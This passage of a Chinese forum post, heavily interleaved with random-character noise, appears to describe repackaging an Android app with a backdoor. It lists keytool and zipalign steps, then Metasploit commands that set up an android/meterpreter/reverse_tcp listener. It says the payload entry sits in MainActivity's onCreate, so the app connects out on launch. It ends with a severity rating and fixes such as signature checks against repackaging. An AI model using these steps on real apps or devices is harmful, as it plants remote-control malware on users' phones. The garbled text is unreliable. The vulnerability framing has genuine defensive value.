7 \& X! E" S. F/ a5 p# f. Y `# i# o. c+ H. b$ C! R, k keytool方式 5 ^4 x7 v6 ?0 O# X7 c0 z& G9 O$ u; L2 |- l$ E& p; r( F; T6 G1 T- l' ^

/ c2 [4 e: C* ^* f- x 1 ]4 H2 e# F, N; i1 o- i% b$ u keytool -printcert -jarfile repackaged.apk & l! E; B; M: @; x- x, U( ? # f# z0 z# V M1 A1 L+ D

! Z' Y6 S1 k( S: H/ Y" S 5 A; j5 m- s% _& Q) h* ^ 对齐 ' T) z# Y6 j( B: G% J! k. |: Y7 \4 Q: i

. O& _- t' G7 Y+ K - b) @2 G1 o2 g& i: N8 t+ x# m( C 字节对齐优化 7 L/ W: c5 V* o8 _; |$ \ j; J/ @! i8 d$ U0 K, B

: b$ X# D6 u6 k5 N, r4 T; X$ q# w( w5 _5 w. b, r zipalign -v 4 repackaged.apk final.apk 7 z, @6 y0 T9 ` _- a# E1 p ' S5 N9 S! d" K

# R- s( \1 N: l4 L {% L ) Z/ l0 Y+ D r2 f! Y 检查是否对齐 8 i8 m) [7 i' V; i $ i8 q u) @3 }; K

$ f2 `% U8 j0 `& m( [7 g, ?3 z8 ?8 h3 ^ b# Y# m4 D% S1 Q zipalign -c -v 4 final.apk - }7 E, M+ q% ~: Y P- M, r 2 k! Y5 l: V8 [, D' R2 F

$ f" Z$ P% _2 u3 j" b4 k) I7 N9 F: W& S 注：zipalign可以在V1签名后执行，但zipalign不能在V2签名后执行,只能在V2签名之前执行 & i+ c h- w5 m$ s: _; t5 l5 N' F2 ^% b2 } 6 H. J4 S t8 y% k* x! s; u; I

( }6 r ^" ]* K S* E- M) E 8 |2 I2 q1 n7 v& Q! ` 启动Metasploit控制台，配置参数等待上线 3 @5 I" _5 M s- b0 A* J; } & v1 K. D: F. J) i

- l6 d* D) J& E4 {% g4 @ $ j. e4 s! l* a C 在终端依次输入如下命令 % s6 l# s7 s g, ?7 S6 R , d# V8 p7 `* R( M( _. N+ U9 i! n5 t

9 g; E2 l: V2 ?7 @* A0 b. C - S- g! X* Y3 V" f6 p msfconsole 3 S4 y' I) B3 t7 @8 y ' ]! @) Z8 l9 z3 f* y( a

) `2 ]: M0 l8 ?3 O0 p0 Q# o# E ' |2 g0 l# E& ?) j7 E$ }) p8 x use exploit/multi/handler ) c0 [6 l h" s1 S# t 4 x" k6 L/ V" f( J0 o# Y

1 _7 m7 C& B: k8 p8 l1 d " B+ w" |0 e. r set PAYLOAD android/meterpreter/reverse_tcp - y: x5 U+ o3 q7 ~+ V1 B" I ( p8 b+ e- h1 B& u4 r

1 D9 B2 w u+ @; l/ B/ G$ l/ ]9 k( B . U9 I! j6 z% k, A5 w) o& ` set LHOST 192.xxx.xx.xx / I9 k; F6 w( \/ k! e: l& Z # I; [. O0 R; O

. X! V6 H: M: a3 l 3 V. C3 H8 ~2 A5 Z set LPORT 4444 8 R4 l6 X2 Y; O9 `! g# u & L) v* J ~. u4 x" l. y+ {/ b: p

' S5 c) x% ]( c* e/ W4 f: ` % w3 I' H' Y/ N' |0 g exploit # K( t# r: t# p/ ? U! f 2 q! Y* u7 C2 R6 Z9 p9 n6 D

5 j, i, \& M1 f/ t9 x # O- x+ I+ d9 d7 N# F7 e! J 之前我们把入口放在 MainActivity 的 onCreate 方法中，当启动目标应用进入该界面，就会连接成功，如下图： " \' e- E- w6 k" n1 b- d% X7 q: o- S; I/ f% Z

5 R9 {, j5 Q; |; Y2 m 4 e9 F# [% m' X0 K, O& \9 ? 漏洞危害：中 ( G! {# Z" o- j' V5 d' ? - G& j/ G# Z1 O8 M$ C

2 ~& K5 d. P% J: {& O+ ?, ` # W9 l( I' U4 {8 d6 g. d ) u0 c0 _" `, {: k* W& A, D) ^ T* W# N" W8 j- S4 ?. u3 M* u 严重程度 # ~9 ]0 J7 Q9 i3 g: T& _9 r ' o4 q( M. U: }4 F: H' P9 j8 d# h 7 ?6 ^( N7 s7 c6 m' \|& a- m( Q3 l% j7 [. n9 l2 F [! j	) h4 f7 f, h2 q! }" ^ 8 @2 \8 O ?! @8 Y4 \( w : X4 \|5 ^% N. l0 @4 \|& @$ z7 T x* \$ B 高 * P S0 p6 u6 a. z$ t. t7 m ! D, n. a" ~4 c( ]1 q- A5 P 1 @1 X3 u A$ ? - f/ B, ^; f; ]. Q* n& \|- y2 q6 H	0 h* Z( I9 B% O! n 1 k# I: {2 l0 J. p& ~, ~- o * m' u6 A4 _* E 7 y. }. V; v; Y: r0 c8 I/ X ■ % ?, \|& x& P+ k* z* s1 g: O# R 7 X6 I4 i+ x$ W K8 E ' \|! s( _5 _2 ]2 X ! R$ ~8 l M5 B( _2 _$ l4 C# I3 F	) I2 G# b8 f7 w ) G# _+ G6 `( i: U, Y! Y/ }. p / R' a' I6 d; l5 Q* S: @. W7 p9 [! i: J( C h5 w- ] 中 0 }+ q! c5 U1 }1 y1 \|% I. { 7 J. J7 k1 _. m& c0 M$ Y9 ~( v+ i 4 Y7 q' i+ w/ V2 p# [	$ E& h9 z# P+ _( S( a. M: R" y: O3 B& } d* i6 n9 i+ o ; B Q @3 s) F9 B0 S$ M " G7 r. U: h6 }% _! @' O 1 }; b b* d, P6 k; a& z+ Q9 l , L* J9 K- f4 i4 Z 0 U6 d' J( q4 m8 S9 x ' H/ }3 a& O6 @; G. { & [* p9 U6 z7 }/ S# x: }9 E$ L( S1 }3 r 2 b- \|7 L/ @4 K1 Q	3 E$ v% R. y3 ] - z8 U2 U2 s( Z7 I - _4 b, s4 g, Z Z) y* g# j4 [; ^7 h0 k" Q! ]5 M' z' p 低 : E* @ D: Y& Y5 a( o " l3 w; [+ s; \|' B' ? ( d: r- C" H+ f9 Y * t0 h; w0 e6 c4 Y) P	4 L z7 N$ R# C y$ s 1 }! ] s1 ?0 h5 n* P ; [5 Z) T7 ~* `/ Z) X9 E: y' u- T; f5 p& A" X. M, k X : U n7 o. Y) c) s1 o, P; i ; Z; {* _1 Q9 W' C( S' h0 s f+ H3 W8 _6 `; ?, M0 _3 N( ? * f9 ?" b9 R8 h' E: q0 e . a$ p7 s% A, S. o# y \" O/ c) u; m1 R" L0 B5 R0 T- Q' O0 i

" t$ Y6 \! W4 {2 Z6 z/ i) R( {$ u- |9 z- }$ P+ Z ) n3 v9 i5 m% E8 g+ B' Q0 i1 k d6 K7 y% m# E& u( q

; L* ]3 q5 M0 X) Y" [ ' U* {5 U! v# y$ r/ T% H 修复方法： * M$ C4 r. e. q, M! S0 b # v! k# s5 ?+ p |9 O! x

' B. E* @! E& M% [6 c' s * P R. z4 o& `* a4 a 1.在 APP 启动时应做签名校验防止二次打包。
" \3 R4 b9 j5 }1 ]% Z( C5 n, D 2 _! J9 B2 V4 v a2 J+ H: W. _ 2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。 * X+ b; }9 [0 D; c) E; k $ N; p$ b! X% v: d0 S

- b% P M _* l2 ?- l3 i0 d+ Z/ d0 z4 u# _; H* y* U ( a& b1 S+ m# r; }" V * E% q( I) h+ q: g6 j' o6 K

% e- m: d) w7 W U0 V/ q* `: d1 W) k: [: S
Y( v1 Z: X& I, \3 O6 N$ _+ |! n7 f0 L- C

		自动登录	找回密码
密码			立即注册